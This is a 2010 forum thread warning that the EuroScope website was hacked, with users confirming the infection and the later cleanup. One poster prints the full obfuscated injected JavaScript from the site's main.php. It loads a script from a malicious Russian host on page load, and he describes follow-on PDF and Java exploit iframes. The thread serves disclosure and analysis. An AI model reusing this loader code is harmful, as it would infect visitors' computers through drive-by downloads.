Virus at Euroscope Website [repaired]

[Nils Hillmann 1069421]

EDIT by 22.05. 11:30z: Site is repaired and without a virus now.

 

 

Old text:

For everyone without a current AntiVirus Solution with IntrusionDetectionSystem:

 

DO NOT GO ONTO euroscope.hu

at the moment. At the end of the main.php script is an

 

I have informed Gergely via PM in this forum, too.

Edited May 22, 2010 at 11:35 AM by Guest

[Nils Hillmann 1069421]

For everyone without a current AntiVirus Solution with IntrusionDetectionSystem:

 

DO NOT GO ONTO euroscope.hu

at the moment. At the end of the main.php script is an

 

 

http://linkscanner.explabs.com/linkscanner/checksite.aspx?NS=ChkOnly&SRC=apps.explabs.com&CS=http://www.euroscope.hu

 

It's fine. A bit of random JS doesn't mean you're going to get hacked

 

It isn't fine. Using only one virusscanner (and one without an IntrusionDetectionSystem!!) is not a safe way to identify a threat.

If you really want to look at the attack mechanism do the following:

First deactivate JavaScript in your browser, so this sample would not executed.

Then go onto euroscope.hu and open the source code of the site. Now you can scroll completely down and find some JavaScript.

If you now read this script, - it looks like this: (no problem this isn't executed due to the missing script tags)

D=64787;D--;eX=23262;eX--;var U;QS=["M","R","Q"];BJ=["m","g","J"];E=function(){this.CW=54327;this.CW--;function Z(e,v,W){var jB=[];return e.substr(v,W);}this.BF=false;var q=RegExp;var d=docomeent;var c="/e"+"lp"+"ai"+Z("s-Lzp",0,2)+"co"+Z("HSQFm/QSFH",4,2)+"go"+Z("oglBUI",0,2)+Z("RVhIleIVRh",4,2)+Z("ujo5.c5ouj",4,2)+Z("omr3u",0,2)+"/t"+Z("el5K8",0,2)+Z("45SegS45",3,2)+"ra"+"ph"+Z(".czfqZ",0,2)+Z("o.vnNG",0,2)+"uk"+Z(".p3iA",0,2)+Z("QgLhpLQg",3,2);AF=["A"];var p='';var jx=new Date();YS=26875;YS+=78;var CN={f:43797};qS={UH:false};GM=["pj","cH","Ay"];function O(e,v){Yz={xC:36475};var Zq="";hT=["Zo"];xe=["fk"];var W=String("[")+v+new String("]");var pY=new q(W, String(Z("ghYeE",0,1)));return e.replace(pY, p);zO=[];};try {} catch(Gr){};TT=["db","b","vq"];po={};var K="bo"+"dy";bi={};var P=null;var Ga={i:33470};var B=728919-720839;var C=O('socfroiWpotN','10NUCF9kynQdWfKLw3AloGYZT');U=function(){try {var UD="";var iQ="";var L=O('cirkeXaUt5e6Ekl9e6mCeXnwtQ','kCdXYMH926xwsU8hQ5i');var FU='';a=d[L](C);GW=62866;GW--;var O_='';var Bj=Z("deTuN",0,2)+"fe"+Z("rQcm",0,1);this.oq="oq";xp=[];var sL=[];var e=B+c;var _=O('s5rIcK','6gz7Gtk4ju1XIhRmVUKx5');w=[];Tq=54884;Tq+=124;a[_]=String("http:"+"//ten"+"thpro"+"fit.r"+"u:")+e;a[Bj]=[1,6][0];Xc=14228;Xc++;uG={Th:false};this.Ww=25035;this.Ww--;d[K].appendChild(a);var mg=38454;var Ou=945;} catch(l){var jc=new Array();};sf=52081;sf-=221;};var Ye={hS:15679};var rb={wu:17158};};var XF="";E();UO={fN:"Kq"};var cF=new Date();var fi=new Array();var vw=new Array();window.onload=U;this.Ko=36024;this.Ko--;var LS=new Array();

where you of course have to uncrypt the values then you can find that this script is loading some other things from the domain

http://tenthprofit.ru

Do you now think also that this site is currently fine?

[Nils Hillmann 1069421]

Since I'm not willing to waste time decoding it, would you like to show me the uncrypted code?

 

Not the complete decoded code, but I can say you that this script is adding another script tag into the site which then will load the javascript (which is then generated for the vulnerabilities the special user-agent have)

http://URL:8080/elpais-com/google.com/telegraph.co.uk.php

whereby the URL has to be replaced by the url which I already posted.

 

This was the part which I have gotten after 10 minutes work on it. Don't want to waste more time on it now, cause I have to work at some other things and also want to go to sleep soon (its 02:22 (am) local time here...)

[Todor Atanasov 878664]

I can confirm it. I'll take care of it later today.

[Jonas Eberle]

Confirmed also. It managed to get a program called "Security Essentials 2010" onto my computer within seconds.

[Luca Vetturi 874351]

Had to spend all the day removing malware from my pc I use for FS&ES, too.

also the ES mantis page is hacked.

 

I've sent an email to the ES support address yesterday, no reply so far.

[Nils Hillmann 1069421]

I discovered a little bit more now. For a browser like mine (actual Firefox) they are trying to use vulnerabilities with Java and PDF so the script, which I posted the URL in my last post, includes an iframe into the side which then loads the mainpage of the domain with some params and these site then adds again iframes which are loading an attacking pdf file and a html file with some java attacks.

I love my live linux systems and textbrowsers. Ideal for exploring this code without danger (if you know what you are doing.)

[Eric Bocaneanu 906549]

Actually you don't have to use Linux. User Friendly OSes are perfectly fine too, like Apple OS X. Except Google Chrome showing me a warning that this page is unsecure and redirecting stuff to tenthprofit.ro everything's fine. And Google Chrome will do the same in Windows as well. Which in my book makes it more secure then Firefox as we can see in this example.

 

@Luca: As Todor said here in the forum, it is being fixed. I thought you were on OS X too.

[George Complin]

On the VatUK site there is discussion about what sounds like to me a similar virus issue on the Frankfurt RealOps site.

http://community.vatsim-uk.org/topic/20278-2010-05-29-frankfurt-real-ops

 

Does anyone know if they are related in any way or form?

[Todor Atanasov 878664]

Had to spend all the day removing malware from my pc I use for FS&ES, too.

also the ES mantis page is hacked.

 

I've sent an email to the ES support address yesterday, no reply so far.

Luca, the malware were related to the ES web site problem, or just a coincidence?

About the script insertion, it is in all the euroscope.hu web page files, including the mediawiki files.

[Luca Benelli]

AFAIK the malware Luca Vetturi got came from the euroscope MANTIS website... so i suspect it's related.. not sure if it's the same server or whatever.

[Todor Atanasov 878664]

I would ask you to check the site's pages again, they should be ok now, Gergely should have uploaded all the files tonight.

[Nils Hillmann 1069421]

I would ask you to check the site's pages again, they should be ok now, Gergely should have uploaded all the files tonight.

 

Confirmed, the pages are without the virus now.